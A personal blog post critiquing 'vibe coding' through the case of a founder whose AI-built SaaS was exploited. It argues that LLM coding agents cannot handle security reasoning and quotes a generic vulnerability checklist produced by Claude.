Vibe coding

Last updated: 9 days ago

Published: 9 days ago

raw source | baked source

blogfeedsoftware engineeringai

This series of screenshots has been making the rounds on the programming-adjacent social media lately:

It plays out like a tragedy in four acts.

leo ridicules the idea that one cannot build a SaaS business end to end with an AI
leo admits that their SaaS business was built entirely with Cursor, and AI-augmented editor, extols its virtues
leo claims someone is trying to find vulnerabilities in their app - while their screenshot shows that the attacker isn’t trying, but rather spectacularly succeeding
leo crashes out blaming their app being exploited on them sharing publicly it was built with Cursor, claiming “there are just some weird ppl out there”

The reactions to this are fairly one-note. “Vibe coding 🤙”, “pride goeth before the fall”, “you get what you pay for”. In other words, it at least reads like a bunch of professional programmers engaging in a victory lap, and/or some chest beating.

Look, ma, we’re still relevant!

I’d like to offer what is hopefully a more nuanced take. tl;dr: not all vibe coding is bad, even though leo here royally goofed up.

LLM isn’t an assistant, it’s also a builder

leo isn’t wrong in that claim. Wait, wait – pitchforks down please, hear me out.

Agent-mode LLM coding tools are an incredible feat of engineering. Not that long ago I’ve seen an agentic Claude 3.7 Sonnet walk the codebase, build itself a test to figure something out, fix some lint issues and offer a reasonable solution to a bug. It’s still a stochastic parrot with some really clever prompting, but it’s an impressive stochastic parrot. I could see this technology be used to implement entire features.

Almost two years ago, I wrote about my experiences with GitHub Copilot. I noted then that it felt like collaborating with a fairly junior developer. Occasional moments of coherent action interspersed with a lot of “mid” results. Of course, back then Copilot only had an assist mode – agentic modes were still years off.

Now agent-mode LLMs offer more than assistance. They purport to offer solutions. They can, indeed, be used as end-to-end builders. Here’s the thing: so can junior developers. If one foists a full build on a sufficiently resourceful and ambitious junior developer, one will eventually get a system out of them. The result might look somewhat okay and at a surface level work pretty well. It might even have some tests and have the appearance of a solid outcome.

Should you put a junior’s project directly into production?

Reasoning from incomplete data

…is a trick humans learn by experience. What’s the best way to learn to avoid XSS? Why, either exploit a system, or get something you built exploited. Same goes for CSRF, SQLi, and any number of other common attacks. Humans learn really well from negative experiences – like being under attack – and from dopamine rushes, like successfully s’kidding one’s way into an insecure system.

But securing a system requires reasoning about second-order effects of your code. It might require reasoning at a feature or system level, rather than at function/file level. One might say agentic LLMs appear to reason at a system level. The word “appear” is load-bearing.

Adding some recursive prompting chicanery in order to slap a reasoning suffix on a model name is, in my opinion, a little dishonest (looking at you, Anthropic!). Multiple passes through a stochastic parrot do not amount to “reasoning”. They amount to multiple passes through a stochastic parrot. The resulting code is less likely to be completely disconnected from the realities of the codebase – or from the relevant library APIs – and that’s all that achieves.

An LLM cannot “think through” the security implications of what it is producing. There may even be guardrails in place that prevent it from properly red-teaming its output. After all, the job of a red team is to inhabit the mindset of an attacker. Claude, ChatGPT and their “colleagues” were likely taught attacking people is a bad thing. An experienced software engineer was (hopefully) taught it was pretty dang fun.

An LLM could help with finding vulnerabilities, right?

I’ve seen this recursive line of thinking. If one can get an LLM to output code, one can also get it to output what to watch out for, right?

I input this prompt into Claude 3.7:

I’m working on securing a web application. My stack is Ruby on Rails on the backend, Typescript and React on the frontend, I’m using PostgreSQL as a database. Provide a concise list of common security vulnerabilities affecting such applications.

Response

Backend (Rails) Vulnerabilities

SQL Injection - especially with raw queries or improper ORM usage
Mass Assignment vulnerabilities (strong parameters misconfiguration)
CSRF token issues if protection is disabled
Authentication flaws (session management, password storage)
Missing authorization checks
Insecure direct object references
Outdated dependencies with known CVEs

Frontend (React/TypeScript) Vulnerabilities

Cross-Site Scripting (XSS) - especially with dangerouslySetInnerHTML
Insecure state management exposing sensitive data
Client-side validation without server-side validation
Insecure handling of JWT tokens (storage in localStorage)
Dependency vulnerabilities in npm packages
Lack of Content Security Policy implementation

Database (PostgreSQL) Vulnerabilities

Excessive privileges for application database users
Unencrypted connections to database
Lack of proper backups and disaster recovery
Unpatched PostgreSQL instances
Weak password policies for database access

API & Data Transfer Vulnerabilities

Missing rate limiting leading to DoS vulnerabilities
Insecure API endpoints without proper authentication
Sensitive data exposure in API responses
Missing HTTPS enforcement
Improper CORS configuration

DevOps & Infrastructure

Secrets management (hardcoded credentials, environment variables exposure)
Insecure deployment practices
Missing WAF or other security monitoring
Insufficient logging for security events
Lack of regular security scanning and testing

That’s not a half-bad checklist, right? Yes - if you already know what these things mean. And how to check for them in real codebases. And how to mitigate them in production systems. A junior engineer (at least a smart one) would go white in the face if one gave them this list and told them to guard against it.

The “vibe coder” doesn’t know what these things mean. They could learn in time, but since they’re by definition not very technical, they’re starting from the ground floor. And it’s a very different ground floor even compared to our hypothetical smart and driven junior dev. What’s more likely is they’d paste this list, one by one, into the Cursor agent window, telling it to fix the issues it finds.

I’ve got no idea what the results would be, but I strongly suspect they do not amount to a secure system – especially since the agent still only sees the code, not the circumstances of its deployment. It might sniff out an SQLi, but it likely won’t find that spot where your production deployment does insecure frontend calls to Firebase, just begging to be replay-attacked.

there are just some weird ppl out there

Every system that can be exploited, will be exploited. This is not scaremongering - it’s statistics. LLMs don’t know how to prevent exploits, but they certainly make it sound like they know what they’re doing. Using these tools with little to none technical knowledge is not a good idea, because unless you know at least a little bit about software engineering, you will not spot where it very confidently screwed up.

Software engineering is not a solved problem by a long shot. Delivering quality systems is a multi-disciplinary quagmire, challenging even to those who spent decades learning the craft.

I postulated above that our “vibe coder” leo could learn how to secure apps. They could have also learned how to write software properly in the first place. It would have taken them years of intense, focused effort, but it’s completely doable.

Except arguably leo doesn’t want to learn to deliver quality, secure software - they want to build products. They seem kinda okay at it, too – according to them people are paying for their SaaS product. That’s not an easy milestone to achieve at all!

My problem with leo is twofold.

One – they decided to go it alone, perhaps lulled into a false sense of security and productivity by the LLM’s authoritative responses. That part I can understand – I’ve seen LLMs spout hilariously bad takes and code, while remaining intensely self-assured. I know how to spot “hilariously bad”. leo’s expertise clearly lay elsewhere. It’s fine not to know how to do something. I couldn’t come up with a marketable SaaS, most likely. But to close such knowledge gaps one gets a co-founder, not a Claude subscription.

My other problem with leo is the arrogance. It’s a strong word, but I find none more appropriate to describe the gung-ho attitude in their initial posts, and the doubling down in the latter. The latter posts almost parse as “I’m being attacked because I use Cursor”. No, leo. You’re being attacked because you put a thing on the internet. There indeed are weird ppl out here – and a technical co-founder would have told you this weeks before releasing your SaaS. An overabundance of confidence might work in business, it rarely works in software engineering.

Vibe coding as a learning tool? To bridge minor gaps in understanding? For quick-and-dirty solutions intended to run locally? Sure, more power to ya. Vibe coding as a shortcut to keep the pesky programmers from eating up your revenue, though?

That, clearly, does not pass the vibe check.

Neither does being oblivious version control exists.

Comments (0)

Add a comment